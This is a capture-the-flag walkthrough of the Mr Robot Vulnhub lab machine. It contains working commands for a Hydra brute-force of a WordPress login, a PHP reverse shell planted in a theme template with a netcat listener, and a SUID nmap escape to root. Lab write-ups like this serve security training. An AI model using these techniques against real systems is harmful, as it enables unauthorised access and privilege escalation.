Mr Robot CTF
Available on Vulnhub
A quick and easy port scan:
nmap 192.168.18.45
Let's check out what's running on port 80:
This website doesn't do too much: a few commands, but nothing that gets us anywhere. Let's look around some more.
/robots.txt
User-agent: *
fsocity.dic
key-1-of-3.txt
Ok this looks interesting…
/key-1-of-3.txt
073403c8a58a1f80d943455fb30724b9
Great, we have our first key, and we have downloaded the dictionary file from /fsocity.dic.
On further examination the fsocity.dic file of 858160 words appears to be messy and contains a lot of duplicates. We may need it for brute-force attacks, so let's remove the duplicates first; otherwise every later password-guessing run will re-try the same candidates thousands of times.
sort fsocity.dic | uniq | wc -l
11451
sort fsocity.dic | uniq > fsocity.txt
Great, we have reduced the dictionary file by 846709 words, from 858160 to 11451.
Let's look around some more and fire up dirb:
dirb http://192.168.18.45
While dirb continues running, I check out /0 (the first result) and find 'just another WordPress site'.
Ok, let's try the default WordPress login page, /wp-admin. Great, a login page. I've watched the series, so let's play about with some obvious entries.
Username and password 'admin' gives an 'Invalid username' error, while username and password 'elliot' gives an 'invalid password' error. The two different messages tell us the account exists before we have the password, so it looks like we have a valid username, 'elliot'. I wonder if we can brute force entry with our password list? Let's fire up Burp Suite to see how the login request is sent to the server.
POST /wp-login.php HTTP/1.1
Host: 192.168.18.45
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.18.45/wp-login.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 100
Cookie: s_cc=true; s_fid=1CA6116ACDD798E8-1D577C92DEB71639; s_nr=1552942461209; s_sq=%5B%5BB%5D%5D; wordpress_test_cookie=WP+Cookie+check
Connection: close
Upgrade-Insecure-Requests: 1

log=elliot&pwd=hi&wp-submit=Log+In&redirect_to=http%3A%2F%2F192.168.18.45%2Fwp-admin%2F&testcookie=1
Now we can fire up Hydra to try to brute force the password. Only the three form fields that matter are replayed; the F= clause names a string that appears only in a failed response ('is incorrect', from the invalid-password message we saw), so any response that lacks it is reported as a hit.
hydra -vV -l elliot -P fsocity.txt 192.168.18.45 http-post-form '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=is incorrect'
Wait a few minutes…
[80][http-post-form] host: 192.168.18.45   login: elliot   password: ER28-0652
1 of 1 target successfully completed, 1 valid password found
Great, we have access to the WordPress CMS. Let's get a shell: we will put a PHP reverse shell into the theme's 404 template.
On our Kali machine I copy the contents of /usr/share/webshells/php/php-reverse-shell.php and paste it into the 404 template (via the default WordPress theme editor), making sure the values for the reverse connection point at my own machine and the port netcat will listen on, 444. We hit save and set up a netcat listener:
nc -nlvp 444
We then open a new browser tab and request /404 to trigger the 404 template and run our payload.
Success, we have a shell. We now spawn a TTY:
python -c 'import pty; pty.spawn("/bin/sh")'
We snoop around: in /home we find /robot, and inside it a raw MD5 hash 'c3fcd3d76192e4007dfb496cca67e13b' and key/flag 2, which we do not have permission to read. I googled the hash and it is known to be the MD5 of 'abcdefghijklmnopqrstuvwxyz'.
We now su robot and try the cracked password. Success! We can now cat key-2-of-3.txt, revealing the second flag '822c73956184f694993bede3eb39f959'.
Time to root. Looking around, I decide to take a look at files with the SUID bit set:
find / -perm -4000 -type f 2>/dev/null
/bin/ping
/bin/umount
/bin/mount
/bin/ping6
/bin/su
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/local/bin/nmap
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
/usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
/usr/lib/pt_chown
nmap? A SUID root binary in /usr/local/bin rather than a package-managed path is the odd one out, so let's see.
nmap -v
Starting nmap 3.81
A quick google of 'nmap 3.81 priv esc' shows that old nmap builds have an --interactive mode (removed from later releases) from which you can escape to a shell. Because this nmap is SUID root, the shell we get has an effective uid of 0; note that the real uid is still robot, but euid=0 is enough to read /root.
nmap --interactive
nmap> !sh
# id
uid=1002(robot) gid=1002(robot) euid=0(root) groups=0(root),1002(robot)
# cd /root
# cat key-3-of-3.txt
04787ddef27c3dee1ee161b21670b4e4
Pwned 😀